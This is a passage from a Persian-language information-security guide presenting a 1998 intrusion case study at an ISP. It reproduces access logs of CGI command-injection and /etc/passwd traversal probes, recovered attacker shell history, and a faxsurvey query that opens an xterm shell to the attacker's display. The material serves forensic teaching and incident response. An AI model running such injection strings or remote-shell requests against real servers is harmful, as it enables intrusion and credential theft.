0 0 VINEYARD.NET.http host-209-214-118.1782 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.http host-209-214-118.1781 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.http host-209-214-118.1775 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.http 56k-2234.hey.net.1099 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.https ESY8.VINEYARD.NE.1557 FIN_WAIT_2
tcp
0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1058 ESTABLISHED
tcp
0 0 LOCALHOST.VINEYA.1058 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp
0 0 APACHE.VINEYARD..smtp m28.boston.juno..54519 ESTABLISHED
tcp
0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.nfs ESTABLISHED
tcp
0 328 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2048 ESTABLISHED
tcp
0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1162 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1160 FIN_WAIT_2
tcp
0 0 NEXT.VINEYARD.NE.ssh ASY12.VINEYARD.N.1047 ESTABLISHED
tcp
0 7300 VINEYARD.NET.pop DSY27.VINEYARD.N.1061 ESTABLISHED
tcp
0 0 NEXT.VINEYARD.NE.imap2 ASY12.VINEYARD.N.1041 ESTABLISHED
tcp
0 0 VINEYARD.NET.3290 VINEYARD.NET.imap2 CLOSE_WAIT
tcp
0 0 VINEYARD.NET.ssh simsong.ne.media.1017 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
tcp
8760 0 VINEYARD.NET.1022 BACKUP.VINEYARD..ssh ESTABLISHED
tcp
0 0 LOCALHOST.VINEYA.4778 *.* LISTEN
tcp
0 0 LOCALHOST.VINEYA.domai *.* LISTEN
tcp
0 0 NET10.VINEYARD.N.domai *.* LISTEN
tcp
0 0 SMTP4.VINEYARD.N.domai *.* LISTEN
٢٧٣
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ:ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻪ ﺩﺳـﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭxterm ﺑﺮﺍﻱ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚCGI ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪISP
: ﺍﻧﺠﺎﻡ ﺷﺪISP ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﺳﺮﻳﻊ ﺩﺭ ﻣﻴﺎﻥ ﺛﺒﺘﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ، ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻳﻦ ﻓﺮﺿﻴﻪ.ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ
1.
2.
3.
4.
5.
6.
7.
8.
ﺑﺨﺶ ﭘﻨﺠﻢ
9.
10.
11.
12.
13.
14.
15.
% grep -I krldb110-06 /vni/apache/log/access_log
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] “GET /cgi-bin/
phf?Qname=me%0als%20-lFa
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] “GET /cgi-bin/ faxsurvey?ls%20lFa HTTP/1.0”
200 5469 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] “GET /cgi-bin/
viewsource?../../../../../../../../
etc/passwd HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows
98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] “GET /cgi-bin/
htmlscript?../../../../../../../../etc/passwd HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE
4.01;Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] “GET /cgi-bin/
campas?%0als%20-lFa
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] “GET /cgi-bin/
handler/useless_shit;ls%20lFa|?data=Download HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE 4.01; Windows
98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] “GET /cgi-bin/
php.cgi?/etc/passwd
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] “GET /cgi-bin/ faxsurvey?ls%20lFa HTTP/1.1”
200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] “GET /cgi-bin/
faxsurvey?uname%20-a
HTTP/1.1” 200 461 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] “GET /cgi-bin/ faxsurvey?id
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] “GET /cgi-bin/
faxsurvey?cat%20/etc/passwd
HTTP/1.1” 200 79467 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] “GET /cgi-bin/ faxsurvey?ls%20lFa%20/usr/
HTTP/1.1” 200 1701 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] “GET /cgi-bin/ faxsurvey?id
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] “GET /cgi-bin/ faxsurvey?pwd
HTTP/1.1” 200
305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] “GET /cgi-bin/
faxsurvey?/bin/pwd HTTP/1.1”
٢٧٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
”200 305 “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)” “/htdocs/web.vineyard.net
16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] “GET /cgi-bin/ faxsurvey?ls%20”lFa HTTP/1.1
”200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net
17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] “GET /cgi-bin/ faxsurvey?ls%20”)lFa%20../conf/ HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98
”“/htdocs/web.vineyard.net
ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺳﻄﺮﻫﺎﻱ ۱ﺗﺎ ۷ﺑﺎ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺍﺧﺘﻼﻑ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺭﺥ ﺩﺍﺩﻩﺍﻧـﺪ .ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﻣﻬـﺎﺟﻢ ﺍﺯ ﻳـﻚ ﺍﺑـﺰﺍﺭ ﺍﺗﻮﻣﺎﺗﻴـﻚ ﻛـﻪ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ CGIﺭﺍ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺩﺭ ﺳﻄﺮﻫﺎﻱ ۸ﺗﺎ ،۱۷ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ
faxsurveyﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ .ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﺮﻳﺐ ﺑﻪ ﻳﻘﻴﻦ ﺑﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﻣﺘﻔﺎﻭﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ .ﻳﻚ ﺩﻟﻴـﻞ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﻧﺴﺨﺔ ﭘﺮﻭﺗﻜﻞ HTTPﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﺮﺩﻩ ﺍﺯ " "HTTP/1.0ﺑﻪ " " HTTP/1.1ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺍﺳﺖ.
ﻓﺎﻳﻞ ﺛﺒﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺁﺷﻜﺎﺭ ﻛﺮﺩ ﻛﻪ ﺍﺳﻢ ﻛﺎﻣﻞ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ krldb110-06.splitrock.netﺑﻮﺩﻩ ﺍﺳـﺖ .ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻓﺮﻣﺎﻥ ،hostﺍﻳﻦ ﺁﺩﺭﺱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺁﺩﺭﺱ IPﻭﺍﻗﻌﻲ ﺗﺮﺟﻤﻪ ﺷﻮﺩ:
apache: {43} % host krldb110-06.splitrock.net
krldb110-06.splitrock.net has address 209.156.113.121
apache: {44} %
ﺑﺎ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻓﺎﻳﻞ ﺛﺒﺖ ،ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ /cgi-bin/faxsurveyﻧﻘﺼﻲ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻓـﺮﺍﻣﻴﻦ
ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻪ ﭼﻪ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺑﻮﺩ ﻣﻬﺎﺟﻢ ﺑﺎ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺭﺳﺎﻝ URLﻫﺎ ﺑﺎ ﺁﺭﮔﻮﻣﺎﻥﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺑﭙﺮﺩﺍﺯﺩ؟(.
ﺍﮔﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺻﺤﺖ ﻣﻲﺩﺍﺷﺖ ،ﺁﻧﮕﺎﻩ ﻓﺮﺍﻣﻴﻦ ﺯﻳﺮ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ:
ls -lFa
ls -lFa
uname -a
id
cat /etc/passwd
ls -lFa /usr/
id
pwd
/bin/pwd
ls -lFa
ls -lFa../conf/
ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﺷﻦ ﻧﻴﺴﺖ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻬﺎﺟﻢ ﺗﻮﺍﻧﺴﺘﻪ ﺍﺯ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻓﺮﺍﻣﻴﻦ ﺑﻪ ﺍﺟﺮﺍﻱ ﻓﺮﻣﺎﻥ xtermﺑﺮﺳﺪ ،ﺍﻣـﺎ ﺑـﻪ ﺧـﻮﺑﻲ ﺭﻭﺷـﻦ
ﺍﺳﺖ ﻛﻪ ﻓﺮﻣﺎﻥ xtermﺍﺟﺮﺍ ﺷﺪﻩ ،ﭼﻮﻥ ﺳﻄﺮ HTTPﺩﺭ ﺧﺮﻭﺟﻲ ﻓﺮﻣﺎﻥ ،wﭘﺮﺩﺍﺯﺓ xtermﺩﺭﺣﺎﻝ ﺍﺟـﺮﺍ ،ﻭ ﺳـﻄﺮ X11ﺩﺭ ﻓﺮﻣـﺎﻥ
netstatﺷﻮﺍﻫﺪﻱ ﺑﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﺴﺘﻨﺪ.
ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ISP ،ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ ﺩﺭ ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺟﺴﺘﺠﻮ ﻛﺮﺩ .ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺸﻜﻮﻙ ﺩﺭ ﻓﺎﻳـﻞ ﺛﺒـﺖ ﭘﻴﺎﻣﻬـﺎ
٤٧
ﭘﻴﺪﺍ ﺷﺪ -ﻇﺎﻫﺮﹰﺍ ﻣﻬﺎﺟﻢ ﺗﻼﺵ ﻛﺮﺩﻩ ﻛﻪ ﺍﺯ ﻳﻚ ﻧﻘﺺ ﺩﺭ POPﻳﺎ qpopperﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ:
* apache: {15} % grep -i krldb110-06
messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06. splitrock.net: -ERR
POP
timeout
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﺎﺑﻘﺔ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﻬﺎﺟﻢ ،ﺁﻧﻬﺎ ﻣﺘﻮﻗﻒ ﺷﺪﻧﺪ ،ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺣﺎﻓﻈﺔ ﭘﺮﺩﺍﺯﺷﻲ ﺫﺧﻴﺮﻩ ﺷﺪ ،ﻭ ﺁﻧﮕـﺎﻩ ﭘـﺮﺩﺍﺯﻩﻫـﺎ ﺍﺯ
ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻪ ﺷﺪﻧﺪ.
Messages Log File
47
٢٧٥
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﻪ ﺩﻧﺒﺎﻝ ﺍﻳﻨﻜﺎﺭ ﻳﻚ ﺿﺎﺑﻄﻪ ﺑﻪ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎﻱ ISPﺍﺿـﺎﻓﻪ ﺷـﺪ ﺗـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺁﺩﺭﺳـﻬﺎﻱ IPﻣﻬـﺎﺟﻢ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻛﻨـﺪ .ﻣﺠﻮﺯﻫـﺎﻱ
ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ faxsurveyﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻨﺪ ﺗﺎ ﻫﻤﻪ ﭼﻴﺰ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﻳﻚ ﺗﺠﺴﺲ ﺁﻣﺎﺩﻩ ﺑﺎﺷﺪ .ﭼﻨـﺪ ﺭﻭﺯ
ﺑﻌﺪ ﻫﻢ ﺗﻜﻪﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺣﺬﻑ ﺷﺪ.
ISPﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺗﻲ SplitRockﺗﻤﺎﺱ ﮔﺮﻓﺖ؛ ﻫﻤﺎﻥ ISPﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺁﺩﺭﺱ IPﻣﻬﺎﺟﻢ ﺭﺍ ﻋﻬـﺪﻩﺩﺍﺭ ﺑـﻮﺩ .ﻣـﺸﺨﺺ
ﺷﺪ ﻛﻪ SplitRockﭼﻨﺪ modem poolﻛﻪ ﺑﺮﺍﻱ ISPﺩﻳﮕﺮ ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﻳﻚ ﻣﻮﺍﻓﻘﺘﻨﺎﻣﺔ ﺍﺟﺎﺭﻩ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﺍﺳـﺖ.
ﺍﺯ SplitRockﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺩﺭ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺗﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ stringsﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻬﺎﺟﻢ ﺑﺪﺳـﺖ ﺁﻳـﺪ .ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ ﺭﺷـﺘﻪﻫـﺎ
٤٨
ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺑﻘﺔ ﭘﻮﺳﺘﻪ ﻣﻲﺷﺪﻧﺪ ،ﻛﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﺗﺎﻳﭗﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺨﺺ ﻣﻬﺎﺟﻢ ﺑﻮﺩﻧﺪ .ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻣﻬﺎﺟﻢ ﻳﻚ rootkit
ﺭﺍ downloadﻛﺮﺩﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻼﺵ ﺩﺍﺷﺘﻪ ﻛﻪ ﻳﻚ ﺣﻤﻠﺔ ﺳﺮﺭﻳﺰﻱ ٤٩Bufferﻋﻠﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ IMAPﺳﻴﺴﺘﻢ ﺍﻧﺠﺎﻡ ﺩﻫﺪ:
Shell History
Buffer Overflow Attack
48
49
ﺑﺨﺶ ﭘﻨﺠﻢ
-lFa
gcc -o s s.c
st2.c
ftp 209.156.113.121
cron.c
gcc -o s st2.c
cxterm.c ./s console
x2.c
t.s
qpush.c .121
cat t.c
qpush.c
cat.c
ppp.c
cat s.c
t2.c
gc c
cron.c
ls -lFa
cxterm.c
./s -v c2 tcsh
./s p0
x2.c
ls -lFa / README
cat.s
README.debian
ls -lFa
qpush
cat /w
qpush.c
ls -lFa / qpush.c.old
cat.s
Gf: not found
_=.s
/tmp
$ : not found
mfs:28
gcc -o s steal.c /bin/sh
ls -lFa *.c
/bin/sh
/bin/sh
/etc/inetd.conf
qpush.c
/usr/bin/gcc
n/gcc
./cc
Expr
Done
/bin/sh
inetd.conf
t) | telnet 127.1 143
cd /etc
cat.s
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٧٦
which pwd
ls –lFa
expr $L + 1
ls –lFa
./cc –10
./cc
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻣﺘﻐﻴﻴﺮﻫﺎﺋﻲ ﺑﻮﺩﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺍﺯ.ﻧﻮﻉ ﺩﻭﻡ ﺭﺷﺘﻪﻫﺎ ﻛﻪ ﺩﺭ ﺗﺼﺎﻭﻳﺮ ﺣﺎﻓﻈﻪ ﭘﻴﺪﺍ ﺷﺪﻧﺪ ﻣﺘﻨﺎﻇﺮ ﻣﺘﻐﻴﻴﺮﻫﺎﻱ ﭘﻮﺳﺘﻪ ﺑﻮﺩﻧﺪ
CGI ﻛﻪ ﻣﺆﻳﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺍﺟﺮﺍﻱ ﭘﻮﺳﺘﻪ ﻧﺘﻴﺠﺔ ﻳﻚ ﺗﻬـﺎﺟﻢ- ﺑﺮﺍﻱ ﻳﻚ ﭘﺮﺩﺍﺯﻩ ﺗﻨﻈﻴﻢ ﺷﻮﻧﺪCGI ﻃﺮﻳﻖ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ
ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ، ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﻧﻔـﻮﺫ ﻣﺘﻮﺟـﻪ ﺁﻥ ﺑـﻮﺩCGI ﺍﻳﻦ ﻗﺴﻤﺖ )ﺑﺨﺶ ﺯﻳﺮ( ﺗﺄﻳﻴﺪ ﻣﻲﻛﺮﺩ ﺁﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ.ﺑﻮﺩﻩ ﺍﺳﺖ
: ﺑﻮﺩfaxsurvey
GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
MACHTYPE=i386-pc-bsdi3.1
HOSTNAME=apache.vineyard.net
L=100
SHLVL=1
REMOTE_ADDR=209.156.113.121
QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20- rv%20e%20/bin/sh
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd. ms-powerpoint,
*/*
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
HTTP_HOST=www.captivacruises.com
LOGNAME=http
WINDOWID=8388621
_=/bins
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.
113.121:0.0%20-rv%20-e%20/bin/sh
SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
TERM=xterm
HTTP_CONNECTION=Keep-Alive
PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
HTTP_ACCEPT_LANGUAGE=en-us
DISPLAY=209.156.113.121:0.0
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
SHELL=/bin/tcsh
REQUEST_METHOD=GET
OSTYPE=bsdi3.1
SERVER_ADMIN=mvol@vineyard.net
SERVER_ROOT=/usr/local/apache
TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:
:al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[
%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\
E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
HOSTTYPE=i386
٢٧٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﭘﺲ ﺍﺯ ﻧﻔﻮﺫ ISP ،ﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺩﻓﺘﺮ ﺗﺠﺴﺲ ﺩﻳﻮﺍﻥ ﻓﺪﺭﺍﻝ ﺩﺭ ﺑﻮﺳﺘﻮﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺖ ISP .ﻣﻄﻠﻊ ﺷﺪ ﻛـﻪ ﺩﻓﺘـﺮ ﺑﻮﺳـﺘﻮﻥ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﺭﺍ ﺷﺮﻭﻉ ﻛﻨﺪ ﻻﺯﻡ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺳﻘﻒ ﻫﺸﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺩﻳﺪﻩ ﺑﺎﺷﺪ .ﭼﻮﻥ ﻣﻴﺰﺍﻥ ﺧـﺴﺎﺭﺕ ﺑـﻪ ﺍﻳـﻦ ﺳـﻘﻒ ﺣـﺪﺍﻗﻠﻲ
ﻧﺮﺳﻴﺪﻩ ﺑﻮﺩ ،ﻫﻴﭻ ﺗﺠﺴﺴﻲ ﺷﺮﻭﻉ ﻧﺸﺪ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﺪﺍﻗﻞﻫﺎﻳﻲ ﻗﺎﺑﻞ ﺩﺭﻙ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﻪ ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﻬﺘﺮ ﺍﺳﺖ
ﺍﻳﻨﮕﻮﻧﻪ ﻧﺒﺎﺷﺪ:
•
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻠﻪﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺴﺒﺘﹰﺎ ﺟﻮﺍﻥ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺍﺧﻄﺎﺭﻳﻪ ﻳﺎ ﺣﺪﺍﻛﺜﺮ ﻳـﻚ ﺣﻜـﻢ
ﺗﻌﻠﻴﻖ ،ﭼﻨﻴﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺭﺍ ﻣﺘﻮﻗﻒ ﻛﻨﻨﺪ .ﻓﻘﺪﺍﻥ ﺗﺠﺴﺲ ﺭﺳﻤﻲ ﻭ ﭘﻴﮕﻴﺮﻱ ﺻـﺮﻓﹰﺎ ﺍﻳـﻦ ﻣﻬﺎﺟﻤـﺎﻥ ﺭﺍ ﺗـﺸﻮﻳﻖ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﻪ
ﺟﺮﻣﻬﺎﻱ ﺑﺰﺭﮔﺘﺮ ﻭ ﺑﺰﺭﮔﺘﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ ﺗﺎ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﺑﺪﻭﺷﺸﺎﻥ ﺑﻴﻔﺘﺪ.
•
